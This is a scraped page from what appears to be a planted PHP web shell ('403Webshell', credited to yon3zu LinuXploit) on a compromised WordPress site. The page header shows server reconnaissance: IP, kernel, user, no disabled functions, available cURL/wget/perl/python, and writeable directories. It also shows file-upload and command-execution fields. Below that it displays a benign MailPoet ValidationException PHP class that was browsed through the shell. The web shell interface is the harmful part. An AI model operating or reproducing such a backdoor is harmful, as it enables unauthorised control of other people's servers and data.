403Webshell
Server IP : 172.67.158.161  /  Your IP : 18.225.92.178
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/home/giankuin/thietke365.net/wp-content/plugins/mailpoet/lib/Doctrine/Validator/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/giankuin/thietke365.net/wp-content/plugins/mailpoet/lib/Doctrine/Validator/ValidationException.php
<?php // phpcs:ignore SlevomatCodingStandard.TypeHints.DeclareStrictTypes.DeclareStrictTypesMissing

namespace MailPoet\Doctrine\Validator;

if (!defined('ABSPATH')) exit;


use MailPoetVendor\Symfony\Component\Validator\ConstraintViolationInterface;
use MailPoetVendor\Symfony\Component\Validator\ConstraintViolationListInterface;

class ValidationException extends \RuntimeException {
  /** @var string */
  private $resourceName;

  /** @var ConstraintViolationListInterface|ConstraintViolationInterface[] */
  private $violations;

  public function __construct(
    $resourceName,
    ConstraintViolationListInterface $violations
  ) {
    $this->resourceName = $resourceName;
    $this->violations = $violations;

    $linePrefix = '  ';
    $message = "Validation failed for '$resourceName'.\nDetails:\n";
    $message .= $linePrefix . implode("\n$linePrefix", $this->getErrors());
    parent::__construct($message);
  }

  /** @return string */
  public function getResourceName() {
    return $this->resourceName;
  }

  /** @return ConstraintViolationListInterface|ConstraintViolationInterface[] */
  public function getViolations() {
    return $this->violations;
  }

  /** @return string[] */
  public function getErrors() {
    $messages = [];
    foreach ($this->violations as $violation) {
      $messages[] = $this->formatError($violation);
    }
    sort($messages);
    return $messages;
  }

  private function formatError(ConstraintViolationInterface $violation) {
    return '[' . $violation->getPropertyPath() . '] ' . $violation->getMessage();
  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit